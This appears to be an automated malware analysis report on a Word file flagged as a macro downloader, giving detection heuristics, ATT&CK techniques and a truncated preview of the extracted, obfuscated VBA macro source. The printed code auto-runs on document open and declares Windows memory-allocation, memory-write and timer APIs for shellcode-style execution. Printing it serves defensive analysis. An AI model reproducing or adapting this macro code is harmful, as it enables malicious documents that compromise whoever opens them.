MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV heuristic also flags it as a downloader. While no direct download URLs are present, the presence of the macro and the downloader heuristic strongly suggest the intent to fetch and execute a secondary payload. The document body content is unrelated to the malicious functionality.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40157 bytes |
SHA-256: 1ed25a27deee0b7554a9bb6974168428e08ffa54cb6924b75647c16644da629b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() spelt wagnerian = 33 + 49 Pmt 0, wagnerian, 14859, 50071, 5 End Sub Attribute VB_Name = "jojojo" #If (18 - 100 + 482 + 74 - 2 + 228) > ((121 - 108 + 307) - (75 - 73 + 538) * 1) And Not ((70 - 16 - 26) - (6 - 90 + 112)) * 2 < (Win64) Then Public Declare Function contingents _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (saintship As Any, ByVal abbess As Any, ByVal cantonal As Any, ByVal phonetic As Any, ByVal stain As Any, ByVal quiscalus As Any, ByVal multiform As Any) As Long Public Declare Function paddlefish _ Lib "Ntdll " Alias _ "NtAllocateVirtualMemory" (irritation As Long, parse As Long, ByVal epiphany As Long, sulcatedByVal As Long, leucine As Long, ByVal oldtimer As Long) As Long Public Declare Function valedictorian _ Lib "Ntdll " Alias _ "ZwWriteVirtualMemory" (ByVal archival As Any, ByVal aweinspiring As Any, ByVal autoimmune As Any, ByVal peacock As Any, ByVal seaworthiness As Any) As Long #End If Sub spelt() Dim canicular As Long Dim molar As Byte fluctuation.quibbling.Value = Day(#12/5/2013#) varday = twentieth = "convex" anguill = coma Set immaturely = fluctuation.quibbling.SelectedItem bisectional = 24 + 57 Pmt 0, bisectional, 22211, 54117, 4 ah = immaturely.Name befogged = 90 - 109 + 7863 modular = Right(ah, befogged) hiker = fattish.centuple(modular) harmonizable = 36 + 34 Pmt 0, harmonizable, 25423, 18192, 2 #If (112 - 106 + 394 + 101 - 82 + 281) > ((109 - 64 + 275) - (33 - 39 + 546) * 1) And ((44 - 122 + 106) - (64 - 1 - 35)) * 2 < (Win64) Then Dim camelopard As Integer Dim limb As LongPtr Dim trisected As LongPtr Dim gazania As LongPtr Dim falsehearted As LongPtr Dim gy As LongPtr prickly = 119 - 59 + 2004 #End If #If (86 - 117 + 431 + 65 - 7 + 242) > ((127 - 69 + 262) - (51 - 50 + 539) * 1) And Not ((8 - 10 + 30) - (19 - 128 + 137)) * 2 < (Win64) Then Dim trisected As Long Dim limb As Long Dim gazania As Long caeteris = 39 - 44 + 786 Dim falsehearted As Long Dim gy As Long prickly = caeteris + 3459 #End If doodia = 117 - 116 - 1 inanity = 17 - 117 + 4196 ciconia = 55 + 24 Pmt 0, ciconia, 13184, 47415, 8 graciousness = garrisoned peacemaker = 5 + 4 Pmt 0, peacemaker, 20710, 43446, 4 jacent = hiker apple = apparentness limb = camelidae(jacent) Dim anseriformes As Integer Dim boyishly As Byte gazania = 95 - 3 - 92 trisected = limb + prickly falsehearted = 28 - 55 + 201554 gy = 42 - 24 + 3482 angloamerican = contingents(falsehearted, _ gazania, trisected, _ gazania, gazania, _ gazania, _ gazania) alcelaphus = 10 + 56 Pmt 0, alcelaphus, 9140, 53979, 5 End Sub Function humani(da, supererogation, rifacimento) Dim brachygraphy As Long Dim wombat As Variant Dim brachiate As Long Dim towith As Long Dim monodic As Long Dim banter As Long Dim imcompleteness As Long Dim shamefacedness As Integer Dim coequal As Long Dim coadjutant As Integer Dim auld As Integer darkhaired = Rnd(416) babble = babble brachygraphy = da coequal = rifacimento darkhaired = Fix(128) monodic = supererogation controlling = 55 + 5 Pmt 0, controlling, 16883, 57370, 6 brachiate = 77 - 75 - 3 valedictorian ByVal brachiate, _ brachygraphy, _ monodic, coequal, _ imcompleteness appositional = cuspidated - 82 End Function Function camelidae(gluck) Dim capon As String Dim pleurodont As Variant Dim cerous As Byte Dim choloepus As Variant #If (36 - 46 + 410 + 23 - 126 + 403) > ((1 - 63 + 382) - (54 - 87 + 573) * 1) And ((106 - 41 - 37) - (100 - 126 + 54)) * 2 < (Win64) Then Dim mated As LongPtr wrapper = 48 - 49 + 9 Dim ctenizidae As LongPtr Dim spiritstirring As Long Dim blain As LongPtr Dim cavaliere As Long factoid = VarPtr(mated) blowtube = truffle(factoid, VarPtr(gluck) + (23 - 10 - 5), wrapper) ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.